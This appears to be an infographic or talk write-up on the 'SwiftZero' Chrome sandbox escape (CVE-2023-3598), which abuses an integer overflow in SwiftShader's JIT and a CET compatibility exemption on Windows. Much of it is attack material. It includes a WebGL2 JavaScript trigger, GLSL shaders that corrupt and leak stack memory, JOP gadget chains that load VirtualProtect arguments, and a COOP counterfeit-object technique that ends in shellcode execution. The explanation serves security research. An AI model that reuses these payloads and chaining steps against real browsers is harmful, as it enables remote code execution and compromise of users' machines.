An infographic detailing the CVE-2023-3598 "SwiftZero" Chrome sandbox escape which bypasses Intel CET Shadow Stack on Windows x64.
Intel's Control-flow Enforcement Technology (CET) is a hardware-level defense. Its key feature for this talk is the Shadow Stack, a CPU-protected stack that creates a secure record of return addresses to prevent backward-edge control flow attacks.
On every function return, the CPU compares the return address on the normal stack with the one on the Shadow Stack. If they differ, it raises a control protection (#CP) fault and the process is terminated. This is designed to defeat return-oriented programming (ROP) attacks.
void foo() { ... }
int main() {
    foo();  // <-- CALL
    // <-- return addr is here
}
The call instruction pushes the return address to both stacks simultaneously.
#CP Fault: Process Terminated
CPU detects mismatch during RET instruction and triggers a hardware fault.
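The call/ret behavior described above can be sketched as a small software model. This is only an illustration: real CET is enforced by the CPU, and the class name `ShadowStackModel`, its methods, and the addresses used are all hypothetical.

```cpp
#include <cstdint>
#include <stdexcept>
#include <vector>

// Toy software model of a shadow stack. All names are illustrative;
// real CET lives in hardware and is not programmable like this.
class ShadowStackModel {
public:
    // CALL: the return address is pushed onto both stacks.
    void call(std::uint64_t return_address) {
        normal_.push_back(return_address);
        shadow_.push_back(return_address);
    }

    // Models an overwrite of the saved return address on the normal
    // stack. The shadow copy is not reachable through this path.
    void corrupt_top(std::uint64_t new_address) {
        if (normal_.empty()) throw std::logic_error("no active frame");
        normal_.back() = new_address;
    }

    // RET: pop both copies and compare them. Returns true when they
    // match; false stands in for the #CP fault.
    bool ret() {
        if (normal_.empty()) throw std::logic_error("no active frame");
        const std::uint64_t from_normal = normal_.back();
        const std::uint64_t from_shadow = shadow_.back();
        normal_.pop_back();
        shadow_.pop_back();
        return from_normal == from_shadow;
    }

private:
    std::vector<std::uint64_t> normal_;
    std::vector<std::uint64_t> shadow_;
};

// Returns true if a clean call/ret pair passes and a corrupted one faults.
inline bool shadow_stack_demo() {
    ShadowStackModel cpu;
    cpu.call(0x401000);
    const bool clean_ok = cpu.ret();      // both copies match

    cpu.call(0x401000);
    cpu.corrupt_top(0x41414141);          // simulated overwrite
    const bool corrupted_ok = cpu.ret();  // copies differ

    return clean_ok && !corrupted_ok;
}
```

Calling `shadow_stack_demo()` exercises both paths: an untouched return passes the comparison, while a return whose normal-stack copy was modified does not.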
pop rcx
ret
A typical gadget found in legitimate code.
MISMATCH: #CP Fault on ret
mov rcx, [rbx]
jmp rcx ; <-- VirtualProtect
A gadget to perform an action and jump.
Shadow Stack still expects the original return address.
MISMATCH: #CP Fault on ret
; COP gadget found in real code
mov rdx, [rax+0x20] ; Load VirtualProtect addr
call rdx ; Call VirtualProtect - SUCCESS!
mov rbx, [rax+0x30] ; ← VirtualProtect returns HERE
add rsp, 0x28 ; Unwanted stack manipulation
pop r14 ; Destroys register state
Real gadgets have problematic instructions that destroy control flow.
Shadow Stack: must return to line 4 (mov rbx, [rax+0x30])
Stack manipulation destroys control
Control flow completely lost
COP can call one function, but can't skip the destructive instructions that follow.
Intel releases the initial CET specification to give the software ecosystem time to prepare.
Intel releases 11th Gen "Tiger Lake" CPUs with CET. Microsoft enables "Hardware-enforced Stack Protection" in Windows 10 (20H1).
Google starts enabling CET support in Chrome 90.
Microsoft introduces Kernel-mode Hardware-enforced Stack Protection in Windows 11 (22H2).
CET's deployment was a multi-year collaboration between hardware, OS, and application vendors.
Windows doesn't just turn CET on. It uses a flexible system called "Hardware-enforced Stack Protection" (HSP). This compatibility mode introduces specific rules that an attacker can potentially exploit.
CPU detects mismatch → KiControlProtectionFault
ALLOW: Legitimate return
ALLOW: JIT/interpreted code exemption
ALLOW: Legacy compatibility
TERMINATE: CET violation detected
The kernel's compatibility exemptions for non-CETCOMPAT dynamic code (like JIT-compiled shaders) create a bypass opportunity. SwiftShader's JIT code is exempt from CET enforcement, allowing our exploit to work.
The vulnerability (CVE-2023-3598) lies within SwiftShader's JIT compiler. A 32-bit integer overflow when calculating stack space for large shader variables leads to a classic stack-based buffer overflow.
void Cfg::sortAndCombineAllocas(CfgVector<InstAlloca *> &Allocas,
                                uint32_t CombinedAlignment, InstList &Insts,
                                AllocaBaseVariableType BaseVariableType) {
  if (Allocas.empty())
    return;
  ...
  uint32_t CurrentOffset = 0; // 32-bit integer can overflow!
  CfgVector<int32_t> Offsets;
  // The vulnerable loop:
  for (Inst *Instr : Allocas) {
    auto *Alloca = llvm::cast<InstAlloca>(Instr);
    uint32_t Alignment = std::max(Alloca->getAlignInBytes(), 1u);
    auto *ConstSize =
        llvm::dyn_cast<ConstantInteger32>(Alloca->getSizeInBytes());
    // Size can be controlled by attacker via shader code
    uint32_t Size = Utils::applyAlignment(ConstSize->getValue(), Alignment);
    ...
    Offsets.push_back(...);
    CurrentOffset += Size; // INTEGER OVERFLOW HERE!
  }
  // Round the offset up to the alignment to determine the final allocation size
  uint32_t TotalSize = Utils::applyAlignment(CurrentOffset, CombinedAlignment);
  ...
}
`uint32_t CurrentOffset = 0;`: CurrentOffset is a 32-bit unsigned integer that can overflow
`uint32_t Size = ...;`: Size can be controlled by the attacker via shader code
`CurrentOffset += Size;`: Integer overflow occurs here when CurrentOffset wraps around
`uint32_t TotalSize = ...;`: The overflowed value leads to an undersized allocation
You can craft shader variables large enough to cause CurrentOffset
to wrap around, resulting in an undersized stack frame allocation.
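The wraparound itself is ordinary unsigned arithmetic and can be shown in isolation. The sketch below is not SwiftShader code and not the upstream fix; `wrapping_total` and `checked_total` are hypothetical helpers, and the sizes in the usage note are illustrative values chosen only to make the sum exceed 2^32.

```cpp
#include <cstdint>
#include <optional>
#include <vector>

// Sums sizes the way a plain uint32_t accumulator does: unsigned
// arithmetic wraps modulo 2^32 without raising any error.
inline std::uint32_t wrapping_total(const std::vector<std::uint32_t>& sizes) {
    std::uint32_t total = 0;
    for (std::uint32_t size : sizes) {
        total += size;  // may silently wrap
    }
    return total;
}

// Same sum with an explicit check before each addition. Returns
// std::nullopt instead of a wrapped value when the sum would not fit.
inline std::optional<std::uint32_t> checked_total(
    const std::vector<std::uint32_t>& sizes) {
    std::uint32_t total = 0;
    for (std::uint32_t size : sizes) {
        if (size > UINT32_MAX - total) {
            return std::nullopt;  // adding size would exceed 2^32 - 1
        }
        total += size;
    }
    return total;
}
```

With the illustrative sizes `{0xFFFFFFF0, 0x20}`, `wrapping_total` yields `0x10`, far smaller than either the true sum or the first element, while `checked_total` reports the overflow by returning an empty optional.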
(() => {
  // Create a temporary canvas to get a WebGL2 context
  const canvas = document.createElement('canvas');
  const gl = canvas.getContext('webgl2');
  if (!gl) {
    console.error("WebGL 2 is not available on your browser.");
    return;
  }
  // Vertex shader that declares the oversized array
  const vsSource = `
#version 300 es
mat4 buf[0xffffff]; // Trigger the overflow in sortAndCombineAllocas
void main() {
  buf[1][2][3]=uintBitsToFloat(0x41414141);
}`;
  // --- The Compilation Process ---
  const shader = gl.createShader(gl.VERTEX_SHADER);
  gl.shaderSource(shader, vsSource);
  gl.compileShader(shader);
  // --- Check the Result ---
  if (gl.getShaderParameter(shader, gl.COMPILE_STATUS)) {
    console.log("Shader compiled successfully!");
  } else {
    console.error("Shader compilation failed:");
    console.error(gl.getShaderInfoLog(shader));
  }
})();
Client-Side Shader Compilation via WebGL2 using JavaScript
`mat4 buf[0xffffff];`: Large array triggers integer overflow
#version 300 es
// Trigger integer overflow in sortAndCombineAllocas
mat4 buf[0xffffff];
void main() {
  // These writes go out of bounds
  buf[1][2][3]=uintBitsToFloat(0x41414141);
}
`mat4 buf[0xffffff];`: Large array triggers integer overflow
`buf[1][2][3]=...;`: Out-of-bounds write overwrites return address
Reading past array bounds exposes sensitive stack data such as return addresses.
#version 300 es
// Trigger integer overflow in sortAndCombineAllocas
mat4 buf[0xfffffff];
flat out uint returnAddr;
void main() {
  // These reads go out of bounds
  returnAddr = floatBitsToUint(buf[1][2][3]);
}
`mat4 buf[0xfffffff];`: Large array triggers integer overflow
`returnAddr = floatBitsToUint(...);`: Out-of-bounds read leaks return address
#version 300 es
mat4 buf[0xffffff];
flat out uint value;
layout(std140) uniform Buffer {
  uint value[0x100];
} buffer;
uint extra[0x10];
void main() {
  // Read and write operations to
  // avoid compiler optimizations
  buf[0][0][0] = uintBitsToFloat(buffer.value[0x1]);
  extra[0] = floatBitsToUint(buf[0][0][0]);
  buf[0][0][1] = uintBitsToFloat(extra[0]);
  // Leak the address of the Uniform Buffer Object
  value = floatBitsToUint(buf[0][2][2]);
}
`mat4 buf[0xffffff];`: Large array triggers integer overflow
The three `buf`/`extra` assignments: Force allocation of GlUniformBufferObject
`value = floatBitsToUint(buf[0][2][2]);`: Leaks address of the Uniform Buffer Object
The shader forces allocation of a GlUniformBufferObject and leaks its address for precise memory layout control.
So what can we do?
We need a technique that:
COOP (Counterfeit Object-Oriented Programming): A code reuse attack targeting C++ applications, introduced by Felix Schuster et al. in 2015.
class SimpleTimer {
  uint64_t deadline;
  bool active;
public:
  void Stop() { active = false; } // Direct call
  void Run() { /* execute */ } // Direct call
};
SimpleTimer* timer = new SimpleTimer();
timer->Stop(); // Direct function call
Lines 5-6: Regular functions use direct calls
No vtable pointer - just data members
class Timer {
  void* vtable_ptr; // Hidden, compiler-added
  uint64_t deadline;
public:
  virtual void Stop() { ... } // Indirect call
  virtual void Run() { ... } // Indirect call
};
Timer* timer = new Timer();
timer->Run(); // Virtual call through vtable
Lines 5-6: Virtual functions require vtable lookup
Hidden vtable pointer added as first member
Regular Function Call
call SimpleTimer::Stop ; Direct call to known address
Virtual Function Call
mov rax, [rcx] ; Load vtable pointer
call [rax+0x8] ; Indirect call through vtable
Virtual functions enable polymorphism but introduce indirection that COOP exploits
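To make the indirection concrete, here is a minimal sketch of ordinary virtual dispatch in standard C++. The types `TimerBase` and `LoggingTimer` and the helper `stop_then_run` are hypothetical and unrelated to Chromium's classes; the point is only that one call site can reach different functions depending on the object it is handed.

```cpp
#include <string>

// Base class with two virtual methods. The compiler adds a hidden
// vtable pointer to every object of this type.
struct TimerBase {
    virtual ~TimerBase() = default;
    virtual std::string Stop() { return "TimerBase::Stop"; }
    virtual std::string Run() { return "TimerBase::Run"; }
};

// Derived class overriding only Stop(); Run() is inherited.
struct LoggingTimer : TimerBase {
    std::string Stop() override { return "LoggingTimer::Stop"; }
};

// The call site is the same for every object. Which function actually
// runs is decided at run time by looking it up through the object's vtable.
inline std::string stop_then_run(TimerBase& timer) {
    return timer.Stop() + ", " + timer.Run();
}
```

Passing a `TimerBase` gives `"TimerBase::Stop, TimerBase::Run"`, while passing a `LoggingTimer` through the very same function gives `"LoggingTimer::Stop, TimerBase::Run"`. The caller's code does not change; only the object's vtable pointer differs.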
1. Control Object Layout
Attacker creates fake objects with controlled vtable pointers
2. Hijack Virtual Calls
Virtual function calls become attacker-controlled indirect calls
; timer->Stop() becomes:
mov rax, [rcx] ; Load fake vtable
call [rax+0x00] ; Calls VirtualProtect!
; timer->Run() becomes:
call [rax+0x08] ; Executes shellcode!
3. Chain Functions
Chain existing functions together to achieve arbitrary behavior
// Original code path:
timer->Stop(); // 1. VirtualProtect
timer->Run(); // 2. Shellcode
// Result: Memory made executable,
// then shellcode runs
COOP bypasses CFI by using legitimate virtual call sites with counterfeit objects.
1. Make Memory Executable (GlUniformBufferObject)
First virtual call must be redirectable to VirtualProtect
2. Execute Our Code
Second virtual call must call our shellcode
void DeadlineTimer::OnScheduledTaskInvoked() {
  DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_);
  DCHECK(!delayed_task_handle_.IsValid());
  // Make a local copy of the task to run. The Stop method will reset the
  // |user_task_| member.
  OnceClosure task = std::move(user_task_);
  Stop(); // Virtual call #1 - Perfect for VirtualProtect
  std::move(task).Run(); // Virtual call #2 - Perfect for shellcode execution
}
`Stop();`: First virtual call - we'll hijack this to call VirtualProtect
`std::move(task).Run();`: Second virtual call - we'll hijack this to execute our shellcode
Two sequential virtual calls with controlled object = perfect COOP gadget
DeadlineTimer::OnScheduledTaskInvoked() (full source available in the Chromium repository)
; RCX = `this` pointer
; (points to our FakeDeadlineTimer object)
push rsi
sub rsp, 0x20
; --- Part 1: Move the task object (std::move(user_task_)) ---
mov rax, [rcx] ; Load vtable pointer from our fake object
mov rsi, [rcx+0x48] ; Load 'user_task_' pointer (points to our payload)
mov qword ptr [rcx+0x48], 0 ; Zero out the pointer
; --- Part 2: Call Stop() -> Hijacked to call VirtualProtect ---
mov rax, [rax+0x10] ; Load function pointer from fake vtable offset 0x10
; We placed &VirtualProtect here
call __guard_dispatch_icall_fptr
; CFG allows this - VirtualProtect is a valid target!
; Makes our shellcode executable
; --- Part 3: Call Run() -> Hijacked to execute shellcode ---
mov rax, [rsi+8] ; Load &Payload from our counterfeit object
mov rcx, rsi ; Set 'this' pointer for the call
call __guard_dispatch_icall_fptr ; Executes our shellcode
; --- Cleanup ---
test rsi, rsi
jne chrome.0x7~
add rsp, 0x20
pop rsi
ret
`mov rax, [rcx]`: Loads our controlled vtable pointer
`mov rsi, [rcx+0x48]`: Loads user_task_, which points to our payload
`mov rax, [rax+0x10]`: Loads &VirtualProtect from our fake vtable
First `call __guard_dispatch_icall_fptr`: Calls VirtualProtect
`mov rax, [rsi+8]`: Loads &Shellcode from our counterfeit object
Second `call __guard_dispatch_icall_fptr`: Second hijacked call - calls our shellcode
Counterfeit object in GlUniformBuffer
Stop() → VirtualProtect
Run() → Shellcode
The object's user_task_ member (offset 0x48) points to offset 0x50, creating a self-referential structure that satisfies the COOP gadget's requirements.
VirtualProtect requires specific arguments in the Windows x64 calling convention:
BOOL VirtualProtect(
  LPVOID lpAddress,      // RCX: Our fake object
  SIZE_T dwSize,         // RDX: Size to protect
  DWORD  flNewProtect,   // R8:  PAGE_EXECUTE_READWRITE
  PDWORD lpflOldProtect  // R9:  Output buffer
);
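The register assignment shown above follows the general rule of the Microsoft x64 calling convention: the first four integer or pointer arguments travel in RCX, RDX, R8, and R9, and later ones go on the stack. A small lookup helper, with the hypothetical name `win64_int_arg_location`, captures that rule for integer and pointer arguments only (floating-point arguments use XMM registers and are not modeled here).

```cpp
#include <array>
#include <cstddef>
#include <string>

// Location of the n-th (0-based) integer or pointer argument under the
// Microsoft x64 calling convention. Floating-point arguments are not
// covered by this sketch.
inline std::string win64_int_arg_location(std::size_t index) {
    static const std::array<const char*, 4> kRegisters = {
        "RCX", "RDX", "R8", "R9"};
    if (index < kRegisters.size()) {
        return kRegisters[index];
    }
    return "stack";  // fifth and later arguments are passed on the stack
}
```

For VirtualProtect, indices 0 through 3 map to `lpAddress`, `dwSize`, `flNewProtect`, and `lpflOldProtect`, so all four arguments fit in registers.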
pop rdx ; Pop value for dwSize (0x1000)
pop r8 ; Pop value for flNewProtect (0x40 = PAGE_EXECUTE_READWRITE)
pop r9 ; Pop value for lpflOldProtect (writable address)
pop rcx ; Pop pointer to our FakeDeadlineTimerObject
pop rax ; Pop address of DeadlineTimer::OnScheduledTaskInvoked
jmp rax ; Jump to our COOP gadget
Lines 1-4: Set up all arguments for VirtualProtect
Line 6: Transfer control to our COOP gadget
The stack is prepared with all arguments before jumping to the JOP gadget.
With control over the instruction pointer but facing modern defenses, the exploit uses a multi-stage process to achieve code execution.
Stage 1: First, We Craft Our Fake Object
Using our bug primitives, we allocate a GlUniformBufferObject and craft a counterfeit `DeadlineTimer` object inside it. We control its entire layout.
Stage 2: Stack Setup & Initial Control
Before triggering the final return, we use the bug's primitives to prepare the stack.
Stage 3: CET Bypass
The kernel's compatibility logic checks the return. Since the shader is non-CETCOMPAT dynamic code, the return is ALLOWED.
Shadow Stack is bypassed. RIP now points to our JOP chain.
Stage 4: Argument Engineering
A "call-less" JOP chain executes, loading registers with arguments for `VirtualProtect` and placing a pointer to our Counterfeit Object into `RCX`.
pop rdx ; Pop value for dwSize
pop r8 ; Pop value for flNewProtect
pop r9 ; Pop value for lpflOldProtect
pop rcx ; Pop pointer to our FakeDeadlineTimerObject
pop rax ; Pop address for the next jump target
jmp rax ; Jump to DeadlineTimer::OnScheduledTaskInvoked
This gadget sets all arguments for VirtualProtect, then jumps to our target function.
Stage 5: Counterfeit Object Execution
void DeadlineTimer::OnScheduledTaskInvoked() {
  // Move our user_task_ obj
  OnceClosure task = std::move(user_task_);
  // &VirtualProtect
  Stop();
  // &Shellcode
  std::move(task).Run();
}
`Stop();`: Stop() hijacked to call VirtualProtect
`std::move(task).Run();`: Run() hijacked to execute shellcode
Stage 6: LPE
The shellcode is downloaded and executed by the GPU process, then triggers a local privilege escalation (LPE).